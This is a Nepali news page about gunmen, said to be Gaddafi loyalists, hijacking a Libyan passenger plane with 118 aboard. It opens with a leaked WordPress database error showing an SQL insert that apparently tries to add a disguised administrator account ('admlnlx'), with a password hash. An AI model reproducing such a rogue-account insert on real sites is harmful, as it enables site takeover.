WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BuDk9a49dhTWstW/3LTIPACMvuA.QL0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 11:24:59', '', 'admlnlx', 'admlnlx')
लिविया,पुस ८-
बन्दुक बोकेका दुई व्यक्तिले लिबियामा यात्रुवहाक विमान कब्जामा लिएका छन्। उनीहरु पूर्व तानाशाह मोहमद्द गद्दाफी पक्षधर रहेको बताइएको छ। १ सय १८ यात्रु सवार विमानलाई उनीहरुले कब्जामा लिएका छन्। आफ्ना माग पुरा नभए विमान पड्काउने चेतावनी उनीहरुले दिएका छन्। अपहरणमा परेको यो सरकारी विमान सेब्हाबाट दक्षिणपश्चिमी लिबिया जादैं थियो।
सन् २०११ मा तानाशाह गद्दाफी मारिएपछि लिबिया अशान्त रहँदै आएको छ। अपहरणकारीहरुले आफ्ना माग पुरा भए यात्रुहरुलाई छाड्ने बताएका छन्। तर उनीहरुले विमानका कर्मचारीहरुलाई छाड्न आफु तयार नरहेको बताएका छन्। उनीहरुले आफ्ना माग भने खुलाएका छैनन्।